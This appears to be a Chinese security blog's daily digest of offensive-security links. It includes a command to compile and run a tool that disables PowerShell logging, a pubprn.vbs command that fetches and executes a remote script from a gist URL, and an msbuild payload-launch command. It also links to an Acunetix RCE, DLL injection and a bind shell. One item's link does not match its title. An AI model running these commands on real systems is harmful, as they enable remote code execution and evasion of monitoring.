---
title: 每日安全干货及动态
date: 2017-12-29 19:10:28
tags: 每日安全干货及动态
categories: 每日安全干货及动态
---
![enter description here][1]

<!--more-->

## 1.<span style="color: #339966;">subTee的代码备份 </span> 

[https://github.com/re4lity/subTee-gits-backups.git][2]

![enter description here][3]
&nbsp;

## 2.<span style="color: #339966;">禁用PS日志记录  </span> 
[https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs][4]
```markdown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe DisablePSLogging.cs /reference:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
DisablePSLogging.exe
```

![enter description here][5]
&nbsp;

##  3.<span style="color: #008000;"> Acunetix 0day RCE    </span>
[https://github.com/dzonerzy/acunetix_0day][6]
&nbsp;

![enter description here][7]
&nbsp;
![enter description here][8]
&nbsp;

![enter description here][9]
&nbsp;

## 4. Gmail 存在<span style="color: #008000;"> XSS</span>
&nbsp;
![enter description here][10]
&nbsp;
![enter description here][11]
&nbsp;


## 5.<span style="color: #008000;">中国互联网 安全领袖峰大会 ---孙冰 PDF   </span>
 [https://github.com/deepchem/deepchem-gui][12]

![enter description here][13]
&nbsp;


## 6.<span style="color: #008000;">Github蜜罐资源列表   </span>

[https://github.com/paralax/awesome-honeypots][14]

![enter description here][15]
&nbsp;

## 7. <span style="color: #008000;">针对说俄语的企业的恶意邮件活动是利用漏洞和Windows office组件的组合来提供新的后门</span>
[http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/][16]

![enter description here][17]
&nbsp;


## 8.<span style="color: #008000;">恶意PAYLOAD </span>

``` stylus
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs localhost
“script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f3
21ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt”

```
![enter description here][18]
&nbsp;


## 9. <span style="color: #008000;">如何用</span><strong><span style="color: #008000;">C＃写注入一个DLL进程</span></strong>

[http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread][19]

![enter description here][20]


## 10. <strong><span style="color: #008000;">MSbuild -----PowaShell.csproj  （具体poc文件 可进技术群 群文件中下载）</span></strong>

``` stylus
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe test.csproj
```
![enter description here][21]

<div style="width:640px;height:480px;margin:0 auto;" id="ivaLive"></div>
<script type="text/javascript" src="http://7xjfim.com2.z0.glb.qiniucdn.com/Iva.js"></script>
<script>
    var ivaInstance = new Iva('ivaLive', {
        appkey: 'By9WGzBIx', //应用标示
        video: 'http://demonsec666.oss-cn-qingdao.aliyuncs.com/powaShellcsproj.mp4', //视频
        title: 'test', //视频标题，后台视频管理中的标题
        cover: '' //视频封面，只有在autoplay:false才可生效
    });
</script>
<script src="//cytroncdn.videojj.com/latest/Iva.js"></script>


## 11. <span style="color: #008000;">TCP-bind shell</span>
https://azeria-labs.com/tcp-bind-shell-in-assembly-arm-32-bit/[enter description here][22]

![enter description here][23]


<span style="color: #008000;">欢迎进入   即刻安全技术交流 :307283889  每日都会分享最新最好的干货 </span>


  [1]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/82260D1294C5293BF83750DE949303D3.png
  [2]: https://github.com/re4lity/subTee-gits-backups.git
  [3]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/0EA4233993FBF51E2348DF59BEAE8008.jpg
  [4]: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
  [5]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/39504489-B900-4A5E-A465-421B7BE5481A.jpg
  [6]: https://github.com/dzonerzy/acunetix_0day
  [7]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/D1E4F2240C9783477A37981453B6FBD8.jpg
  [8]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/B412B944CB0CBEA152AC2417120FB212.jpg
  [9]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/9E3BE0E31476927E33544C2CE5BF2112.jpg
  [10]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/9E9B8D1553C1D57C91B3A08DAEBD8445.jpg
  [11]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/A293B4D82E929433DE7BEA6AA2F10D71.jpg
  [12]: https://github.com/deepchem/deepchem-gui
  [13]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/85022A4F-8FA7-4DA6-A90A-BCDE3E718D83.jpg
  [14]: https://github.com/paralax/awesome-honeypots
  [15]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/63580377-3020-449B-9930-C7BC4295DCD2.jpg
  [16]: http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/
  [17]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/52ABA646BD48089649F92485EC09A18F.jpg
  [18]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/93B45FFD4A1AAFADA5C1C7DABCE3CD87.jpg
  [19]: http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread
  [20]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/D8C6FAC0E2AFA5D0DB137D052ED28AB1.jpg
  [21]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/BCFF9C401D2DE0E7B9B7E53F1836037E.jpg
  [22]: https://azeria-labs.com/tcp-bind-shell-in-assembly-arm-32-bit/
  [23]: http://demonsec666.oss-cn-qingdao.aliyuncs.com/4B3B029A796E703D43E3E2AFA962D373.jpg 